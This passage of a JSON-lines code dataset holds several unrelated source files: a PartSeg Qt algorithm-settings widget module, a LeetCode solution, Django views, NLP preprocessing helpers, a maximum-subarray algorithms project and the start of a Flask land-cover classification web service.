CustomDoubleSpinBox):\n return widget.__class__.value, widget.__class__.setValue\n elif isinstance(widget, QLineEdit):\n return widget.__class__.text, widget.__class__.setText\n elif isinstance(widget, SubAlgorithmWidget):\n return widget.__class__.get_values, widget.__class__.set_values\n elif isinstance(widget, ListInput):\n return widget.__class__.get_value, widget.__class__.set_value\n raise ValueError(f\"Unsupported type: {type(widget)}\")\n\n\nclass ListInput(QWidget):\n change_signal = Signal()\n\n def __init__(self, property_el: QtAlgorithmProperty, length):\n super().__init__()\n self.input_list = [property_el.from_algorithm_property(property_el) for _ in range(length)]\n layout = QVBoxLayout()\n for el in self.input_list:\n el.change_fun.connect(self.change_signal.emit)\n layout.addWidget(el.get_field())\n self.setLayout(layout)\n\n def get_value(self):\n return [x.get_value() for x in self.input_list]\n\n def set_value(self, value):\n if not isinstance(value, (list, tuple)):\n value = [value for _ in range(len(self.input_list))]\n for f, val in zip(self.input_list, value):\n f.set_value(val)\n\n\ndef any_arguments(fun):\n def _any(*_):\n fun()\n\n return _any\n\n\nclass FormWidget(QWidget):\n value_changed = Signal()\n\n def __init__(self, fields: typing.List[AlgorithmProperty], start_values=None, dimension_num=1):\n super().__init__()\n if start_values is None:\n start_values = {}\n self.widgets_dict: typing.Dict[str, QtAlgorithmProperty] = dict()\n self.channels_chose: typing.List[typing.Union[ChannelComboBox, SubAlgorithmWidget]] = []\n layout = QFormLayout()\n layout.setContentsMargins(10, 0, 10, 0)\n # layout.setVerticalSpacing(0)\n element_list = map(QtAlgorithmProperty.from_algorithm_property, fields)\n for el in element_list:\n if isinstance(el, QLabel):\n layout.addRow(el)\n elif isinstance(el.get_field(), SubAlgorithmWidget):\n label = QLabel(el.user_name)\n if el.help_text:\n label.setToolTip(el.help_text)\n layout.addRow(label, el.get_field().choose)\n layout.addRow(el.get_field())\n self.widgets_dict[el.name] = el\n if el.name in start_values:\n el.get_field().set_starting(start_values[el.name])\n el.change_fun.connect(any_arguments(self.value_changed.emit))\n else:\n self.widgets_dict[el.name] = el\n label = QLabel(el.user_name)\n if el.help_text:\n label.setToolTip(el.help_text)\n layout.addRow(label, el.get_field())\n # noinspection PyUnresolvedReferences\n if issubclass(el.value_type, Channel):\n # noinspection PyTypeChecker\n self.channels_chose.append(el.get_field())\n if el.name in start_values:\n try:\n el.set_value(start_values[el.name])\n except (KeyError, ValueError, TypeError):\n pass\n el.change_fun.connect(any_arguments(self.value_changed.emit))\n self.setLayout(layout)\n self.value_changed.connect(self.update_size)\n\n def has_elements(self):\n return len(self.widgets_dict) > 0\n\n def update_size(self):\n self.setMinimumHeight(self.layout().minimumSize().height())\n\n def get_values(self):\n return {name: el.get_value() for name, el in self.widgets_dict.items()}\n\n def recursive_get_values(self):\n return {name: el.recursive_get_values() for name, el in self.widgets_dict.items()}\n\n def set_values(self, values: dict):\n for name, value in values.items():\n if name in self.widgets_dict:\n self.widgets_dict[name].set_value(value)\n\n def image_changed(self, image: Image):\n if not image:\n return\n for channel_widget in self.channels_chose:\n if isinstance(channel_widget, ChannelComboBox):\n channel_widget.change_channels_num(image.channels)\n else:\n channel_widget.change_channels_num(image)\n\n\nclass SubAlgorithmWidget(QWidget):\n values_changed = Signal()\n\n def __init__(self, algorithm_property: AlgorithmProperty):\n super().__init__()\n if not isinstance(algorithm_property.possible_values, dict):\n raise ValueError(\n \"algorithm_property.possible_values should be dict.\" f\"It is {type(algorithm_property.possible_values)}\"\n )\n if not isinstance(algorithm_property.default_value, str):\n raise ValueError(\n \"algorithm_property.default_value should be str.\" f\"It is {type(algorithm_property.default_value)}\"\n )\n self.starting_values = {}\n self.property = algorithm_property\n self.widgets_dict: typing.Dict[str, FormWidget] = {}\n # TODO protect for recursion\n widget = FormWidget(algorithm_property.possible_values[algorithm_property.default_value].get_fields())\n widget.layout().setContentsMargins(0, 0, 0, 0)\n widget.value_changed.connect(self.values_changed)\n\n self.widgets_dict[algorithm_property.default_value] = widget\n self.choose = QComboBox(self)\n self.choose.addItems(list(algorithm_property.possible_values.keys()))\n self.setContentsMargins(0, 0, 0, 0)\n\n self.choose.setCurrentText(algorithm_property.default_value)\n\n self.choose.currentTextChanged.connect(self.algorithm_choose)\n # self.setStyleSheet(\"border: 1px solid red\")\n layout = QVBoxLayout()\n layout.setContentsMargins(4, 4, 4, 4)\n layout.addWidget(widget)\n if not widget.has_elements():\n widget.hide()\n self.hide()\n tmp_widget = QWidget(self)\n # tmp_widget.setMinimumHeight(5000)\n layout.addWidget(tmp_widget)\n self.tmp_widget = tmp_widget\n self.setLayout(layout)\n\n def set_starting(self, starting_values):\n self.starting_values = starting_values\n\n def set_values(self, val: dict):\n if not isinstance(val, dict):\n return\n self.choose.setCurrentText(val[\"name\"])\n if val[\"name\"] not in self.widgets_dict:\n self.algorithm_choose(val[\"name\"])\n if val[\"name\"] in self.widgets_dict:\n self.widgets_dict[val[\"name\"]].set_values(val[\"values\"])\n\n def recursive_get_values(self):\n return {name: el.recursive_get_values() for name, el in self.widgets_dict.items()}\n\n def get_values(self):\n name = self.choose.currentText()\n values = self.widgets_dict[name].get_values()\n return {\"name\": name, \"values\": values}\n\n def change_channels_num(self, image: Image):\n for i in range(self.layout().count()):\n el = self.layout().itemAt(i)\n if el.widget() and isinstance(el.widget(), FormWidget):\n el.widget().image_changed(image)\n\n def algorithm_choose(self, name):\n if name not in self.widgets_dict:\n if name not in self.property.possible_values:\n return\n start_dict = {} if name not in self.starting_values else self.starting_values[name]\n try:\n self.widgets_dict[name] = FormWidget(\n self.property.possible_values[name].get_fields(), start_values=start_dict\n )\n except KeyError as e:\n raise e\n self.widgets_dict[name].layout().setContentsMargins(0, 0, 0, 0)\n self.layout().addWidget(self.widgets_dict[name])\n self.widgets_dict[name].value_changed.connect(self.values_changed)\n widget = self.widgets_dict[name]\n for i in range(self.layout().count()):\n lay_elem = self.layout().itemAt(i)\n if lay_elem.widget():\n lay_elem.widget().hide()\n if widget.has_elements():\n self.show()\n widget.show()\n else:\n self.hide()\n self.values_changed.emit()\n\n def showEvent(self, _event):\n # workaround for changing size\n self.tmp_widget.hide()\n\n def paintEvent(self, event: QPaintEvent):\n name = self.choose.currentText()\n if self.widgets_dict[name].has_elements() and event.rect().top() == 0 and event.rect().left() == 0:\n painter = QPainter(self)\n painter.drawRect(event.rect())\n\n\nclass AbstractAlgorithmSettingsWidget(with_metaclass(ABCMeta, object)):\n def __init__(self):\n pass\n\n @abstractmethod\n def get_values(self):\n \"\"\"\n :return: dict[str, object]\n \"\"\"\n return dict()\n\n\nclass BaseAlgorithmSettingsWidget(QScrollArea):\n values_changed = Signal()\n algorithm_thread: SegmentationThread\n\n def __init__(self, settings: BaseSettings, name, algorithm: typing.Type[SegmentationAlgorithm]):\n \"\"\"\n For algorithm which works on one channel\n \"\"\"\n super().__init__()\n self.settings = settings\n self.widget_list = []\n self.name = name\n self.algorithm = algorithm\n main_layout = QVBoxLayout()\n self.info_label = QLabel()\n self.info_label.setHidden(True)\n main_layout.addWidget(self.info_label)\n start_values = settings.get(f\"algorithm_widget_state.{name}\", dict())\n self.form_widget = FormWidget(algorithm.get_fields(), start_values=start_values)\n self.form_widget.value_changed.connect(self.values_changed.emit)\n # self.form_widget.setMinimumHeight(1500)\n self.setWidget(self.form_widget)\n value_dict = self.settings.get(f\"algorithms.{self.name}\", {})\n self.set_values(value_dict)\n # self.settings.image_changed[Image].connect(self.image_changed)\n self.algorithm_thread = SegmentationThread(algorithm())\n self.algorithm_thread.info_signal.connect(self.show_info)\n self.algorithm_thread.exception_occurred.connect(self.exception_occurred)\n\n def exception_occurred(self, exc: Exception):\n if isinstance(exc, SegmentationLimitException):\n mess = QMessageBox()\n mess.setIcon(QMessageBox.Critical)\n mess.setText(\"During segmentation process algorithm meet limitations:\\n\" + \"\\n\".join(exc.args))\n mess.setWindowTitle(\"Segmentation limitations\")\n mess.exec()\n return\n if isinstance(exc, RuntimeError) and exc.args[0].startswith(\n \"Exception thrown in SimpleITK KittlerIllingworthThreshold\"\n ):\n mess = QMessageBox()\n mess.setIcon(QMessageBox.Critical)\n mess.setText(\"Fail to apply Kittler Illingworth to current data\\n\" + exc.args[0].split(\"\\n\")[1])\n mess.setWindowTitle(\"Segmentation limitations\")\n mess.exec()\n return\n dial = ErrorDialog(exc, \"Error during segmentation\", f\"{QApplication.instance().applicationName()}\")\n dial.exec()\n\n def show_info(self, text):\n self.info_label.setText(text)\n self.info_label.setVisible(True)\n\n def image_changed(self, image: Image):\n self.form_widget.image_changed(image)\n self.algorithm_thread.algorithm.set_image(image)\n\n def set_mask(self, mask):\n self.algorithm_thread.algorithm.set_mask(mask)\n\n def set_values(self, values_dict):\n self.form_widget.set_values(values_dict)\n\n def get_values(self):\n return self.form_widget.get_values()\n\n def channel_num(self):\n return self.channels_chose.currentIndex()\n\n def execute(self, exclude_mask=None):\n values = self.get_values()\n self.settings.set(f\"algorithms.{self.name}\", deepcopy(values))\n self.algorithm_thread.set_parameters(**values)\n self.algorithm_thread.start()\n\n def hideEvent(self, a0: QHideEvent):\n self.algorithm_thread.clean()\n\n def recursive_get_values(self):\n return self.form_widget.recursive_get_values()\n\n\nclass AlgorithmSettingsWidget(BaseAlgorithmSettingsWidget):\n def execute(self, exclude_mask=None):\n self.algorithm_thread.algorithm.set_image(self.settings.image)\n super().execute(exclude_mask)\n\n\nclass InteractiveAlgorithmSettingsWidget(BaseAlgorithmSettingsWidget):\n algorithm_thread: SegmentationThread\n\n def __init__(self, settings, name, algorithm: typing.Type[SegmentationAlgorithm], selector: typing.List[QWidget]):\n super().__init__(settings, name, algorithm)\n self.selector = selector\n self.algorithm_thread.finished.connect(self.enable_selector)\n self.algorithm_thread.started.connect(self.disable_selector)\n # noinspection PyUnresolvedReferences\n if hasattr(settings, \"mask_changed\"):\n settings.mask_changed.connect(self.change_mask)\n\n def value_updated(self):\n if not self.parent().interactive:\n return\n self.execute()\n\n def change_mask(self):\n if not self.isVisible():\n return\n self.algorithm_thread.algorithm.set_mask(self.settings.mask)\n\n def disable_selector(self):\n for el in self.selector:\n el.setDisabled(True)\n\n def enable_selector(self):\n for el in self.selector:\n el.setEnabled(True)\n\n def get_segmentation_profile(self) -> SegmentationProfile:\n return SegmentationProfile(\"\", self.algorithm.get_name(), self.get_values())\n\n\nclass AlgorithmChoose(QWidget):\n finished = Signal()\n started = Signal()\n result = Signal(SegmentationResult)\n value_changed = Signal()\n progress_signal = Signal(str, int)\n algorithm_changed = Signal(str)\n\n def __init__(\n self, settings: BaseSettings, algorithms: typing.Dict[str, typing.Type[SegmentationAlgorithm]], parent=None\n ):\n super().__init__(parent)\n self.settings = settings\n self.algorithms = algorithms\n settings.algorithm_changed.connect(self.updated_algorithm)\n self.stack_layout = QStackedLayout()\n self.algorithm_choose = QComboBox()\n self.algorithm_dict: typing.Dict[str, BaseAlgorithmSettingsWidget] = {}\n self.algorithm_choose.currentTextChanged.connect(self.change_algorithm)\n self.add_widgets_to_algorithm()\n\n self.settings.image_changed.connect(self.image_changed)\n # self.setMinimumWidth(370)\n\n self.setContentsMargins(0, 0, 0, 0)\n layout = QVBoxLayout()\n layout.setContentsMargins(0, 0, 0, 0)\n layout.addWidget(self.algorithm_choose)\n layout.addLayout(self.stack_layout)\n self.setLayout(layout)\n\n def add_widgets_to_algorithm(self):\n self.algorithm_choose.blockSignals(True)\n self.algorithm_choose.clear()\n for name, val in self.algorithms.items():\n self.algorithm_choose.addItem(name)\n widget = InteractiveAlgorithmSettingsWidget(self.settings, name, val, [])\n self.algorithm_dict[name] = widget\n widget.algorithm_thread.execution_done.connect(self.result.emit)\n widget.algorithm_thread.finished.connect(self.finished.emit)\n widget.algorithm_thread.started.connect(self.started.emit)\n widget.algorithm_thread.progress_signal.connect(self.progress_signal.emit)\n widget.values_changed.connect(self.value_changed.emit)\n self.stack_layout.addWidget(widget)\n name = self.settings.get(\"current_algorithm\", \"\")\n self.algorithm_choose.blockSignals(False)\n if name:\n self.algorithm_choose.setCurrentText(name)\n\n def reload(self, algorithms=None):\n if algorithms is not None:\n self.algorithms = algorithms\n for _ in range(self.stack_layout.count()):\n widget: InteractiveAlgorithmSettingsWidget = self.stack_layout.takeAt(0).widget()\n widget.algorithm_thread.execution_done.disconnect()\n widget.algorithm_thread.finished.disconnect()\n widget.algorithm_thread.started.disconnect()\n widget.algorithm_thread.progress_signal.disconnect()\n widget.values_changed.disconnect()\n self.algorithm_dict = {}\n self.add_widgets_to_algorithm()\n\n def updated_algorithm(self):\n self.change_algorithm(\n self.settings.last_executed_algorithm,\n self.settings.get(f\"algorithms.{self.settings.last_executed_algorithm}\"),\n )\n\n def recursive_get_values(self):\n result = {}\n for key, widget in self.algorithm_dict.items():\n result[key] = widget.recursive_get_values()\n self.settings.set(\"algorithm_widget_state\", update(self.settings.get(\"algorithm_widget_state\", dict), result))\n return result\n\n def change_algorithm(self, name, values: dict = None):\n self.settings.set(\"current_algorithm\", name)\n widget = self.stack_layout.currentWidget()\n self.blockSignals(True)\n if name != widget.name:\n widget = self.algorithm_dict[name]\n self.stack_layout.setCurrentWidget(widget)\n widget.image_changed(self.settings.image)\n if hasattr(widget, \"set_mask\") and hasattr(self.settings, \"mask\"):\n widget.set_mask(self.settings.mask)\n elif values is None:\n self.blockSignals(False)\n return\n if values is not None:\n widget.set_values(values)\n self.algorithm_choose.setCurrentText(name)\n self.blockSignals(False)\n self.algorithm_changed.emit(name)\n\n def image_changed(self):\n current_widget: InteractiveAlgorithmSettingsWidget = self.stack_layout.currentWidget()\n if hasattr(self.settings, \"mask\") and hasattr(current_widget, \"change_mask\"):\n current_widget.change_mask()\n current_widget.image_changed(self.settings.image)\n\n def mask_changed(self):\n current_widget: InteractiveAlgorithmSettingsWidget = self.stack_layout.currentWidget()\n if hasattr(self.settings, \"mask\") and hasattr(current_widget, \"change_mask\"):\n current_widget.change_mask()\n\n def current_widget(self) -> InteractiveAlgorithmSettingsWidget:\n return self.stack_layout.currentWidget()\n\n def current_parameters(self) -> SegmentationProfile:\n widget = self.current_widget()\n return SegmentationProfile(\"\", widget.name, widget.get_values())\n\n def get_info_text(self):\n return self.current_widget().algorithm_thread.get_info_text()\n\n\n# AbstractAlgorithmSettingsWidget.register(AlgorithmSettingsWidget)\n","sub_path":"package/PartSeg/common_gui/algorithms_description.py","file_name":"algorithms_description.py","file_ext":"py","file_size_in_byte":25875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"572472039","text":"from functools import cmp_to_key\n\nclass Solution:\n def isAlienSorted(self, words, order):\n \"\"\"\n :type words: List[str]\n :type order: str\n :rtype: bool\n \"\"\"\n letter_weights = {letter: index for index, letter in enumerate(order)}\n for index in range(len(words) - 1):\n first_word = words[index]\n second_word = words[index + 1]\n if self.compare_words(first_word, second_word, letter_weights) > 0: return False\n return True\n \n def compare_words(self, first, second, letter_weights):\n first_len = len(first)\n second_len = len(second)\n index = 0\n while index < first_len or index < second_len:\n if index >= first_len: return -1\n elif index >= second_len: return 1\n first_letter = first[index]\n second_letter = second[index]\n if letter_weights[first_letter] < letter_weights[second_letter]: return -1\n elif letter_weights[first_letter] > letter_weights[second_letter]: return 1\n index += 1\n return 0","sub_path":"leetcode/953.verifying-an-alien-dictionary/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"98176595","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render\n\nfrom models import Organization, Agent\n\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom neoutils import create_activate_deactivate_object\n\nfrom data.handlers import CheckHandler\n\n@api_view(['POST'])\ndef create_activate_deactivate_organization(request):\n action = request.data['action']\n name = request.data['name']\n data = {'name': name}\n\n return Response(create_activate_deactivate_object(Organization, action, **data))\n\n@api_view(['POST'])\ndef create_activate_deactivate_agent(request):\n action = request.data['action']\n first_name = request.data['first_name']\n last_name = request.data['last_name']\n data = {'first_name': first_name, 'last_name': last_name}\n\n return Response(create_activate_deactivate_object(Agent, action, **data))\n\n@login_required\ndef dashboard(request):\n context = {}\n offences = CheckHandler.fetch_offences()\n return render(request, 'data/offences.html', {\n 'offences': offences, 'fines': CheckHandler.get_fines(),\n 'payments': CheckHandler.get_payments()})\n\n@login_required\ndef checks(request):\n return render(request, 'data/successful_checks.html', {\n 'checks': CheckHandler.fetch_checks()\n })","sub_path":"data/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"180839168","text":"from django.shortcuts import render, reverse, redirect\nfrom border.forms import *\nfrom border.models import *\nfrom django.http import HttpResponseRedirect\n\n\nmealRate = {'Breakfast': 8,\n 'Lunch': 30,\n 'Dinner': 27,\n 'Breakfast+Lunch': 38,\n 'Breakfast+Dinner': 35,\n 'Lunch+Dinner': 57,\n 'Breakfast+Lunch+Dinner': 65}\n\n# Create your views here.\n\n\ndef index(request):\n return render(request, 'border/index.html')\n\n\ndef newBorder(request):\n form = BorderInfoForm()\n info = BorderInfo.objects.all().order_by('bazar')\n\n if request.method == 'POST':\n form = BorderInfoForm(data=request.POST)\n if form.is_valid():\n name = request.POST['name']\n room = request.POST['room']\n mobile = request.POST['mobile']\n email = request.POST['email']\n if request.POST['bazar']:\n bazar = request.POST['bazar']\n else:\n bazar = None\n\n BorderInfo.objects.create(name=name, room=room, mobile=mobile,\n email=email, bazar=bazar)\n return HttpResponseRedirect(reverse('index'))\n\n return render(request, 'border/newBorder.html', {'form': form, 'info': info})\n\n\ndef borderList(request):\n data = BorderInfo.objects.all()\n context = {'form': data}\n return render(request, 'border/borderList.html', context=context)\n\n\ndef borderDetail(request, pk):\n profile = BorderInfo.objects.get(id=pk)\n mealinfo = MealInfo.objects.get_or_create(name=profile)[0]\n deposite = DepositeInfo.objects.filter(name=profile)\n\n if request.method == 'POST':\n try:\n if request.POST['meal']:\n meal = request.POST['meal']\n rate = mealRate[meal]\n mealinfo.meal = meal\n mealinfo.rate = rate\n except KeyError:\n pass\n\n try:\n if request.POST['alterMeal']=='on':\n alter = True\n except KeyError:\n alter = False\n\n\n # try:\n # if request.POST['deposite']:\n # amount = request.POST['deposite']\n # print(amount)\n # DepositeInfo(name=profile, amount=amount, date=datetime.now())\n # except KeyError:\n # pass\n\n mealinfo.alter = alter\n mealinfo.save()\n\n mealinfo = MealInfo.objects.filter(name=profile)\n return HttpResponseRedirect(request.path_info)\n\n context = {'profile': profile, 'deposite': deposite, 'mealinfo': mealinfo}\n return render(request, 'border/borderDetail.html', context=context)\n","sub_path":"mealManager/border/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"109303819","text":"import gensim\nimport constants\n\n\ndef load_w2v_model(file_name: str):\n global w2v_model\n print(\"starting to load a w2v model\")\n w2v_model = gensim.models.KeyedVectors.load_word2vec_format(file_name)\n print(\"w2v model '%s' loaded\" % file_name)\n return w2v_model\n\n\n# Получить вектора массива слов\ndef get_vectors(words: list) -> list:\n global w2v_model\n try:\n return [w2v_model[word] for word in words]\n except MemoryError:\n return []\n\n\n# Получить вектор слова\ndef get_similarity(word1: str, word2: str) -> list:\n global w2v_model\n try:\n return w2v_model.similarity(word1, word2)\n except MemoryError:\n return []\n\n\n# Получить tn ассоциаций\ndef get_associations(words: list, tn=10) -> list:\n global w2v_model\n assoc_lst = []\n try:\n assoc_lst = w2v_model.most_similar(positive=words, topn=tn)\n except MemoryError:\n pass\n finally:\n if assoc_lst == []:\n raise KeyError\n return assoc_lst\n\n\nw2v_model = load_w2v_model(constants.w2w_model_file)\n","sub_path":"semantics.py","file_name":"semantics.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"46762705","text":"import time\nimport random\nfrom math import floor\n'''\nReads data from input file\nReturns list of list of ints\nParameters:\nfilename - string name of file to open\n'''\ndef getInputData(filename):\n data = []\n with open(filename) as inFile:\n for line in inFile:\n line = line.split()\n line = [int(i) for i in line]\n data.append(line)\n return data\n\n'''\nwrites data to file in specified format\nParameters:\noutFile - file object in write mode\nA - full array\nstartPos - starting position of subArray\nendPos - end position of subArray\ntotal - sum of maximum subArray\n'''\ndef writeData(outFile, A, startPos, endPos, total):\n outFile.write(' '.join(str(x) for x in A) + '\\n')\n outFile.write(' '.join(str(A[x]) for x in range(startPos, endPos+1)) + '\\n')\n outFile.write(str(total) + '\\n\\n')\n \n'''\nenumerative version of Max_Subarray\ncomputes A[i] + A[i+1] + ... + A[j-1] + A[j] each time\nParameters:\nA - an array of ints\nReturns - array consisting of original array, startPositon of subarray, endPositon of subArray, and maximum subarray sum\n'''\ndef Enum_Max_Subarray(A):\n maximum = A[0]\n subArrayStart = 0\n subArrayEnd = 0\n currentTotal = 0\n for i in range(len(A)):\n for j in range(i+1, len(A)):\n currentTotal = 0\n for k in range (i, j+1):\n currentTotal += A[k]\n if currentTotal > maximum:\n maximum = currentTotal\n subArrayStart = i\n subArrayEnd = j\n return [A, subArrayStart, subArrayEnd, maximum]\n\n'''\nBetter enumerative version of Max_Subarray\nstores prior computations of A[i] + A[i+1] + ... + A[j-1] \nParameters:\nA - an array of ints\noutFile - file object in write mode\nReturns - array consisting of original array, startPositon of subarray, endPositon of subArray, and maximum subarray sum\n\n'''\ndef Better_Enum_Max_Subarray(A):\n maximum = A[0]\n subArrayStart = 0\n subArrayEnd = 0\n currentTotal = 0\n for i in range(len(A)):\n currentTotal = A[i]\n for j in range(i+1, len(A)):\n currentTotal += A[j]\n if currentTotal > maximum:\n maximum = currentTotal\n subArrayStart = i\n subArrayEnd = j\n return [A, subArrayStart, subArrayEnd, maximum]\n\ndef DCHelper(A):\n return Divide_and_Conquer(A, 0, len(A) - 1)\n\ndef Divide_and_Conquer(A, low, high):\n if high == low:\n return[A, low, high, A[low]]\n else:\n mid = ((low + high) / 2)\n (A, leftLow, leftHigh, leftSum) = Divide_and_Conquer(A, low, mid)\n (A, rightLow, rightHigh, rightSum) = Divide_and_Conquer(A, mid + 1, high)\n (A, crossLow, crossHigh, crossSum) = maxCrossing(A, low, mid, high)\n \n if (leftSum >= rightSum and leftSum >= crossSum):\n return[A, leftLow, leftHigh, leftSum]\n elif (rightSum >= leftSum and rightSum >= crossSum):\n return[A, rightLow, rightHigh, rightSum]\n\n return[A, crossLow, crossHigh, crossSum]\n \ndef maxCrossing(A, low, mid, high):\n leftSum = float(\"-inf\")\n sum = 0\n maxRight = 0\n maxLeft = 0\n for i in range(mid, low - 1, -1):\n sum = sum + A[i]\n if sum > leftSum:\n leftSum = sum\n maxLeft = i\n rightSum = float(\"-inf\")\n sum = 0\n for j in range(mid + 1, high + 1):\n sum = sum + A[j]\n if sum > rightSum:\n rightSum = sum\n maxRight = j\n \n return(A, maxLeft, maxRight, leftSum + rightSum)\n\n \n'''\nLinear algorithm to solve the max subarray problem.\nParameters: \nA - Array to search for maximum subarray from.\nReturns:\nMaximum subarray sum, start and end positions of maximum subarray.\n'''\ndef Linear_Max_Subarray(A):\n maxSum = maxSoFar = A[0]\n subArrayStart = subArrayEnd = 0\n for i in range(1, len(A)):\n maxSoFar = max(A[i], maxSoFar + A[i])\n if maxSoFar == A[i]:\n subArrayStart = i\n maxSum = max(maxSum, maxSoFar)\n if maxSum == maxSoFar:\n subArrayEnd = i\n return [A, subArrayStart, subArrayEnd, maxSum]\n\n\n'''\nget time data from function with various input sizes\nparameters:\nfunctionToCall: function of algorithm you want to test\ninputSizes: list of input sizes\nReturns - A list of time data for each inputSize\n'''\ndef timeFunction(functionToCall, inputSizes):\n timeList = []\n #go through all input Sizes\n for i in inputSizes:\n currLists = []\n #need to make 10 arrays of each inputSize\n for j in range(10):\n a = []\n #append i random integers to a list\n for k in range(i):\n a.append(random.randint(-1000,1000))\n currLists.append(a)\n \n #currLists now holds 10 arrays of size i\n #call and time the function with 10 different arrays for each inputSize\n times = []\n for j in range(10): \n startTime = time.time()\n functionToCall(currLists[j])\n times.append(time.time() - startTime)\n avgTime = sum(times) / 10.0\n timeList.append(avgTime) #timeList holds the averages for all\n return timeList\n\n'''\nprint time data\nParameters:\nfunction - name of function you want to call\ninputSizes - list of inputSizes to test\n'''\ndef getExperimentalData(function, inputSizes):\n timeList = timeFunction(function, inputSizes)\n print(str(function))\n for x in range(len(timeList)):\n print('n = ' + str(inputSizes[x]) + ': ' + str(timeList[x]))\n\n'''\ncreates output file\nparameters:\n\ninFilename - string of filename for input\noutFilename - string of filename for output\n'''\ndef createOutputFile(inFilename, outFilename):\n outFile = open(outFilename, 'w') #open outFile here so it overwrites existing file only once\n data = getInputData(inFilename)\n params = []\n functionsList = [Enum_Max_Subarray, Better_Enum_Max_Subarray, DCHelper,Linear_Max_Subarray] \n functionNames = [\"Enumerative\", \"Better Enumerative\", \"Divide and Conquer\", \"Linear\"]\n for i in range(len(functionsList)):\n outFile.write(\"-------------\" + functionNames[i] + \"-------------\\n\\n\")\n for j in range(len(data)):\n params = functionsList[i](data[j])\n #parameters for each function should be (outfile, originalArray, startPos, endPos, maximum)\n writeData(outFile, params[0], params[1], params[2], params[3])\n outFile.close()\n\n\n\n#-----Similar calls should work for your function as long as the function takes in a single list of integers, and returns a list in the form:\n#[Full array, Start of subarray, end of subarray, sum of subarray]\n \n\nenumInputSizes = [500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400]\nbetterEnumInputSizes = [7000, 9000, 11000, 13000, 15000, 17000, 19000, 21000, 23000, 25000]\ndncInputSizes = [200000, 225000, 250000, 275000, 300000, 325000, 350000, 375000, 400000, 425000]\nlinearInputSizes = [1000000, 2000000, 3000000, 4000000, 5000000, 6000000, 7000000, 8000000, 9000000, 10000000]\n\n#Gets experimental data for various n value\ngetExperimentalData(Enum_Max_Subarray, enumInputSizes)\ngetExperimentalData(Better_Enum_Max_Subarray, betterEnumInputSizes)\ngetExperimentalData(DCHelper, dncInputSizes)\ngetExperimentalData(Linear_Max_Subarray, linearInputSizes)\n\n\n''' THE LINE BELOW SHOULD BE THE ONLY LINE WE NEED FOR OUR SUBMISSION -- IT SHOULD HAVE\nMSS_Problems.txt as inputFile and MSS_Results.txt as outputFile'''\n\n#takes in input file and writes results in specified file -- see note above about functions to pass in\n\ncreateOutputFile('MSS_Problems.txt', 'MSS_Results.txt')\n\n\n","sub_path":"project1.py","file_name":"project1.py","file_ext":"py","file_size_in_byte":7676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"273315327","text":"import torch\nfrom utils import load_data, dataset2sentences, dataset2vocab, initialise_bpe, bpe_apply, map_encoded_sentences_to_dataset\n\nTRAIN_FILE_PATH = \"./data/train_bio.txt\"\nTEST_FILE_PATH = \"./data/test_bio.txt\"\nVALID_FILE_PATH = \"./data/valid_bio.txt\"\n\ninitialise_bpe()\n\n\nfor (path, name) in zip([TRAIN_FILE_PATH, TEST_FILE_PATH, VALID_FILE_PATH], ['train', 'test', 'valid']):\n data = load_data(path)\n\n sentences = dataset2sentences(data)\n encoded_sentences = bpe_apply(sentences)\n m = mapped_encoded_sentences = map_encoded_sentences_to_dataset(data, encoded_sentences)\n with open(\"data/{}_bio_bpe.txt\".format(name), \"w\") as f:\n for s in m:\n for word in s:\n f.write(str(\" \".join(word) + \"\\n\"))\n\n f.write(\"\\n\")\n\n","sub_path":"src/embeddings.py","file_name":"embeddings.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"291282380","text":"#\n# This file is part of Land Cover Classification System Web Service.\n# Copyright (C) 2020-2021 INPE.\n#\n# Land Cover Classification System Web Service is free software; you can redistribute it and/or modify it\n# under the terms of the MIT License; see LICENSE file for more details.\n#\n\"\"\"Views of Land Cover Classification System Web Service.\"\"\"\nfrom io import BytesIO\n\nfrom bdc_auth_client.decorators import oauth2\nfrom flask import abort, current_app, jsonify, request, send_file\nfrom lccs_db.utils import get_extension\n\nfrom lccs_ws.forms import (ClassesMappingMetadataSchema, ClassesMappingSchema,\n ClassesSchema, ClassificationSystemMetadataSchema,\n ClassificationSystemSchema, ClassMetadataSchema,\n StyleFormatsMetadataSchema, StyleFormatsSchema)\n\nfrom . import data\nfrom .config import Config\n\nBASE_URL = Config.LCCS_URL\n\n\n@current_app.route(\"/\", methods=[\"GET\"])\ndef root():\n \"\"\"URL Handler for Land User Cover Classification System through REST API.\"\"\"\n links = list()\n response = dict()\n \n links += [\n {\"href\": f\"{BASE_URL}/\", \"rel\": \"self\", \"type\": \"application/json\", \"title\": \"Link to this document\"},\n {\"href\": f\"{BASE_URL}/classification_systems\", \"rel\": \"classification_systems\", \"type\": \"application/json\",\n \"title\": \"List classification_systems\", }\n ]\n \n response[\"links\"] = links\n response[\"lccs_version\"] = Config.BDC_LCCS_API_VERSION\n \n return response\n\n\n@current_app.route(\"/classification_systems\", methods=[\"GET\"])\ndef get_classification_systems():\n \"\"\"Retrieve the list of available classification systems in the service.\"\"\"\n classification_systems_list = data.get_classification_systems()\n \n for class_system in classification_systems_list:\n links = [\n {\n \"href\": f\"{BASE_URL}/classification_systems/{class_system['id']}\",\n \"rel\": \"classification_system\",\n \"type\": \"application/json\",\n \"title\": \"Link to Classification System\",\n },\n {\n \"href\": f\"{BASE_URL}/classification_systems/{class_system['id']}/classes\",\n \"rel\": \"classes\",\n \"type\": \"application/json\",\n \"title\": \"Link to 